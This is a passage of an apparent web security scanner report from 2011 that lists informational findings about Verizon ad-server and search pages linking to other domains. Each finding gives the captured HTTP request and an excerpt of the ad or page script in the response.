ntral.verizononline.com/RealMedia/ads/click_lx.ads/business2.vz.net/out/homepage/L29/1318839174/x13/VDSL/House_SMB_300x100_2010-03/300x100_superpages.jpg/4d686437616b356c5473304142582f54?x" target=" "><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_SMB_300x100_2010-03/300x100_superpages.jpg/1268256714" ALT="" BORDER="0"></A>
...[SNIP]...

15.21. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/news/189057460@Top1,x13?popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal/smb?_nfpb=true&_pageLabel=SMBPortal_page_newsandresources_headlinedetail&newsId=48291&portletTitle=Small%20Business%20Expert%20Advice&FromHeroTab=article&Headline=Five%20Powerful%20Lists%20to%20Help%20You%20Take%20Command%20of%20Your%20Work%20Life
Cookie: OAX=Mhd7ak5lTs4AAhpq; NSC_d17efm_qppm_iuuq=ffffffff09499e3c45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:36:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1090
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Top1') {
document.write ('<a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/business2.vz.net/out/news/L25/1322801724/Top1/VDSL/house_300x250_smb_intuit/intuit_wireless_smb_300x250.html/4d686437616b356c5473344141687071" target="_blank"> \n');
document.write ('<img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/house_300x250_smb_intuit/adbanner_intuit_300x250.gif/1299008084" border="0" \n');
document.write ('width="300" height="250" alt=""/>
</a>
...[SNIP]...
/RealMedia/ads/click_lx.ads/business2.vz.net/out/news/L25/99503660/x13/VDSL/House_SMB_300x100_2010-03/zcloud_smb_sept2010.html/4d686437616b356c5473344141687071" target="_blank"> \n');
document.write ('<img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_SMB_300x100_2010-03/zCloud_sept2010.gif/1285012947" border="0" \n');
document.write ('width="300" height="100" alt=""/>
</a>
...[SNIP]...

15.22. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/business2.vz.net/out/travelportlet/113860497@Top1?search= HTTP/1.1
Host: oascentral.verizononline.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1359
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Top1') {
document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N2870.vznbiz/B3160296;sz=300x300;ord=571859577?" WIDTH=300 HEIGHT=300 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N2870.vznbiz/B3160296;abr=!ie;sz=300x300;ord=571859577?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
_2008-10/Orbitz_NAF_biz.net_TrvBE_2008-10.html/4d686437616b356c5473344141687071?http://ad.doubleclick.net/jump/N2870.vznbiz/B3160296;abr=!ie4;abr=!ie5;sz=300x300;ord=571859577?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N2870.vznbiz/B3160296;abr=!ie4;abr=!ie5;sz=300x300;ord=571859577?" BORDER=0 WIDTH=300 HEIGHT=300 ALT="Click Here"></A>
...[SNIP]...

15.23. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/my.verizon.com/homepage/newuser/150843310@Top1,Bottom,Bottom1,BottomRight?search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5lS3YAAoHO; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:41:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2555
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('\n');
document.write ('        <a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/my.verizon.com/homepage/newuser/L31/307160572/Bottom/VDSL/House_300x100_SBCPromo_2011-02/House_300x100_SBC-MadeEasier_2011-02.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_SBCPromo_2011-02/sbc_banner_300x100_made_easier.jpg/1298398283" style="border:0px black solid;" width="300" height="100" alt="" />\n');
document.write ('</a>
...[SNIP]...
com/homepage/newuser/L31/461590858/Bottom1/VDSL/House_300x100_RoomtoLearn_2011-03/House_300x100_RoomtoLearn_3DTV_2011-03.html/4d686437616b356c53335941416f484f" target="_top">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_RoomtoLearn_2011-03/RTL_3DTV_300x100_v4_31711.jpg/1301320906" style="border:0px black solid;" width="300" height="100" alt="" />\n');
document.write ('</a>
...[SNIP]...
my.verizon.com/homepage/newuser/L31/533474869/BottomRight/VDSL/House_300x100_Perks_2011-07/House_300x100_Perks_2011-07.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x100_Perks_2011-07/50791_300x100.jpg/1310155675" style="border:0px black solid;" width="300" height="100" alt="" />\n');
document.write ('</a>
...[SNIP]...
.ads/my.verizon.com/homepage/newuser/L31/1308990206/Top1/VDSL/House_300x250_STN_2011-08/300x250RewardsforReferrals.jpg.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_300x250_STN_2011-08/300x250RewardsforReferrals.jpg/1313608230" style="border:0px black solid;" width="300" height="250" alt="" />\n');
document.write ('</a>
...[SNIP]...

15.24. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/shopvz.net/homepage/109403470@Right,Right1?search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:21:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1251
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right') {
document.write ('        <a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/shopvz.net/homepage/L19/1930716668/Right/VDSL/House_180x150_PaperFree_2011-06/House_180x150_PaperFree2_2011-06.html/4d686437616b356c53335941416f484f" target="_top">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_PaperFree_2011-06/pfb_sweeps_180x150.jpg/1308073583" style="border:0px black solid;" width="180" height="150" alt="" />\n');
document.write ('</a>
...[SNIP]...
ck_lx.ads/shopvz.net/homepage/L19/617420134/Right1/VDSL/House_180x150_SBCPromo_2011-02/House_180x150_SBC-Build_2011-02.html/4d686437616b356c53335941416f484f" target="_blank">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_SBCPromo_2011-02/sbc_banner_180x150_build.jpg/1298398048" style="border:0px black solid;" width="180" height="150" alt="" />\n');
document.write ('</a>
...[SNIP]...

15.25. http://oascentral.verizononline.com/RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /RealMedia/ads/adstream_mjx.ads/vznewsroom.net/homepage.html/122796748@Top1,x20,x21,x37,x38,x48,x49,x50,Right1?search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5lS3YAAoHO; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:42:42 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4473
Content-Type: application/x-javascript

function OAS_RICH(position) {
if (position == 'Right1') {
document.write ('        <a href="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/1285194082/Right1/VDSL/House_180x150_RoomtoLearn_2011-03/House_180x150_RoomtoLearn_kidproof_2011-03.html/4d686437616b356c53335941416f484f" target="_top">\n');
document.write (' <img src="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/House_180x150_RoomtoLearn_2011-03/RTL_kidproof_180x150_v2_31711.jpg/1301322390" style="border:0px black solid;" width="180" height="150" alt="" />\n');
document.write ('</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=<[token="dynamic" handler="sv" key="postal_code"]>;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/syn.verizon/news_read_atf;tile=1;sz=300x250;postalcode=<[token="dynamic" handler="sv" key="postal_code"]>;ord=123456789?" border="0" alt="" />
...[SNIP]...
<A HREF="http://oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/1689080054/x38/default/empty.gif/4d686437616b356c53335941416f484f?x" target="_top"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif/0" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
//oascentral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/1287766493/x48/VDSL/eBay_NAF_vznews_302_2009-10/ad_ebay.gif/4d686437616b356c53335941416f484f?x" target="_top"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/eBay_NAF_vznews_302_2009-10/ad_ebay.gif/1254758783" ALT="" BORDER="0"></A>
...[SNIP]...
tral.verizononline.com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/624913022/x49/VDSL/Orbitz_NAF_vznews_302_2008-02/302x72_orbitz2.gif/4d686437616b356c53335941416f484f?x" target="_new"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/Orbitz_NAF_vznews_302_2008-02/302x72_orbitz2.gif/1209134446" ALT="" BORDER="0"></A>
...[SNIP]...
com/RealMedia/ads/click_lx.ads/vznewsroom.net/homepage.html/L28/418353767/x50/VDSL/Experian_NAF_vzc_FS_302_2009-07/freecredit_green_302x7242924205.gif/4d686437616b356c53335941416f484f?x" target="_new"><IMG SRC="http://imagec17.247realmedia.com/RealMedia/ads/Creatives/VDSL/Experian_NAF_vzc_FS_302_2009-07/freecredit_green_302x7242924205.gif/1287531523" ALT="" BORDER="0"></A>
...[SNIP]...

15.26. http://s7.addthis.com/js/250/addthis_widget.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/250/addthis_widget.js

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /js/250/addthis_widget.js?username=rgadevtest HTTP/1.1
Host: s7.addthis.com
Proxy-Connection: keep-alive
Referer: http://smallbusiness.verizon.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,12|36

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 25 Aug 2011 11:55:33 GMT
ETag: "f80f13-11f96-4ab531b26b740"
Accept-Ranges: bytes
Content-Length: 73622
Content-Type: application/x-javascript
Date: Mon, 05 Sep 2011 22:16:23 GMT
Connection: close
Vary: Accept-Encoding

/* (c) 2008, 2009, 2010 Add This, LLC */
if(!window._ate){var _atd="www.addthis.com/",_atr="//s7.addthis.com/",_atn="//l.addthiscdn.com/",_euc=encodeURIComponent,_duc=decodeURIComponent,_atc={dr:0,ver
...[SNIP]...
yle||"1",aZ=aG.share.url=ai.href||_ate.track.mgu(aG.share.url,{defrag:1}),a6=ai.height||"20px",au=ai.width||"75px";if(aa=="5"){a6=ai.height||"60px"}else{if(aa=="6"){a6=ai.height||"31px"}}aI.innerHTML='<iframe src="//www.stumbleupon.com/badge/embed/{{STYLE}}/?url={{URL}}" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:{{WIDTH}}; height:{{HEIGHT}};" allowtransparency="true"></iframe>
...[SNIP]...
",a6).replace("{{WIDTH}}",au);aI.noh=aI.ost=1}else{if(a1.indexOf("hyves_respect")>-1){var a9=h(aI,"hy:respect"),ae=aG.share.url=a9.url||_ate.track.mgu(aG.share.url,{defrag:1}),aS=a9.width||"140px",aJ='<iframe src="//www.hyves.nl/respect/button?url={{URL}}" style="border: medium none; overflow:hidden; width:{{WIDTH}}; height:22px;" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...

15.27. http://search.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.verizon.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?market=94531+zz&q=wss&rv=l&search.x=0&search.y=0&st=zz&tp=l&u1=q HTTP/1.1
Host: search.verizon.com
Proxy-Connection: keep-alive
Referer: http://search.verizon.com/?tp=l&rv=l&q=xss&search.x=0&search.y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=xss~xss%20sq~~~; CP=null*

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:18:05 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 70987


                   <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" type="text/css" href="https://www22.verizon.com/in
...[SNIP]...
<meta name="description" content="Your enterprise faces complex challenges. And to be more competitive, you have to address them all. You need to merge complex networks as you ">
<script src="http://www.verizonbusiness.com/(none20:54:40)/templates/vzbcann/site.js" type="text/javascript" language="JavaScript"></script>
...[SNIP]...
</script>

   <link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb00002f7b/publish/includes/css/marquee.css" />
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/gn_engine.js"></script>
   <script type="text/javascript" src="http://content.atomz.com/pb00002f7b/publish/includes/js/search.js"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://content.atomz.com/pb000035a2/publish/includes/css/default.css" />

<script type="text/javaScript">
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://www.verizonbusiness.com//(none18:52:08)/templates/vzbar/site.js">
</script>
...[SNIP]...
</a><a accesskey="1" title="Home" class="logo" name="&#38;lid=logo" href="http://www.verizonbusiness.com/"><img src="http://www.verizonbusiness.com/templates/vzbar/logo.gif" alt="Verizon Business" class="logo" height="55" width="152" /></a>
...[SNIP]...
<li class="t left"><a href="http://www.verizonbusiness.com/support/">Contact Us</a>
...[SNIP]...
<li onMouseOut="if(self.vzDO)vzDO(this);" onMouseOver="if(self.vzDD)vzDD(this);" id="changecountry" class="t right"><a class="down" href="http://www.verizonbusiness.com/countries/">Worldwide Site</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col1"><a href="http://www.verizonbusiness.com/solutions/" name="&#38;lpos=topnav">Solutions</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/category.xml">Explore by Category</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/itsolutions/">IT Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/security/">Security Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/communications/">Communications Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/network/">Network Solutions</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/professional/">Professional Services</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/industry.xml">Explore by Industry</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/education/">Education</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/finance/">Financial Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/government/">Government</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/healthcare/">Healthcare</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/retail/">Retail</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/business.xml">Explore by Business Need</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/application/">Application and Performance Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/continuity/">Business Continuity</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/markets/">Expanding Your Global Business</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/green/">Going Green</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/mobility/">Mobility</a></li>
<li><a href="http://www.verizonbusiness.com/solutions/teleworking/">Teleworking</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/collaboration/">Unified Communications and Collaboration</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/wholesale/">Carrier &amp; Wholesale</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/wholesale/us/">United States</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/solutions/wholesale/ips/">International</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/solutions/var/index.xml">Channel Partners &amp; VARs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/de/solutions/var/">Germany</a></li>
<li><a href="http://www.verizonbusiness.com/it/solutions/var/">Italy</a></li>
<li><a href="http://www.verizonbusiness.com/nl/solutions/var/">Netherlands</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/se/solutions/var/">Sweden</a></li>
<li><a href="http://www.verizonbusiness.com/uk/solutions/var/">United Kingdom</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/us/solutions/var/">United States</a>
...[SNIP]...
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col2"><a href="http://www.verizonbusiness.com/products/" name="&#38;lpos=topnav">Products</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/voip/">VoIP</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/ipflex/">IP Flexible T1</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/trunking/">IP Trunking Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/centrex/">Hosted IP Centrex</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/ippbx/">Managed IP PBX</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/voip/profsvcs/">Professional Services</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/data/">Data and IP Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/privateip/">Private IP Layer 3</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/privateip2/">Private IP Layer 2</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/vpls/">VPLS</a></li>
<li><a href="http://www.verizonbusiness.com/products/data/ethernet/">Ethernet Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/dedicated/">IP VPN Dedicated</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/remote/">Remote VPN</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/sig/">Secure Gateway</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/framerelay/">Frame Relay</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/atm/">ATM</a></li>
<li><a href="http://www.verizonbusiness.com/products/data/privateline/">Private Line</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/ring/">Ring Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/transaction/">Transaction Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/data/digital/">Digital Media</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/wireless/">Wireless</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/wirelessvoice/">Wireless Voice Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/emaildata/">E-mail and Data Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/pbx/">PBX Mobile Extension</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/wireless/backup/">Wireless Backup</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/internet/">Internet Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/dsl/">DSL and Cable</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/dedicated/">Dedicated Access</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/satellite/">Satellite Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/internet/dial/">Dial-Up</a></li>
<li><a href="http://www.verizonbusiness.com/products/internet/fios/">FiOS</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/security/">Security</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/professional/">Professional Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/managed/">Managed Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/compliance/">Compliance and Governance</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/identity/">Identity &amp; Authentication Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/govt/">Government Programs</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/cpe/">CPE Resale</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/security/risk/">Risk Team</a>
...[SNIP]...
<li><a href="http://securityblog.verizonbusiness.com/">Security Blog</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" onMouseOut="vzDO(this)" class="666"><a href="http://www.verizonbusiness.com/products/itsolutions/">IT Solutions and Hosting</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/caas/">Computing as a Service (CaaS)</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/apphosting/">IP Application Hosting</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/remote/">Remote IP Application Management</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/datacenter/">Data Center Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/virtualization/">Virtualization</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/backuprestore/">Backup and Restore Services</a>
...[SNIP]...
<li><a href="http://www.verizonbusiness.com/products/itsolutions/servicedesk/">IT Service Desk</a>
...[SNIP]...
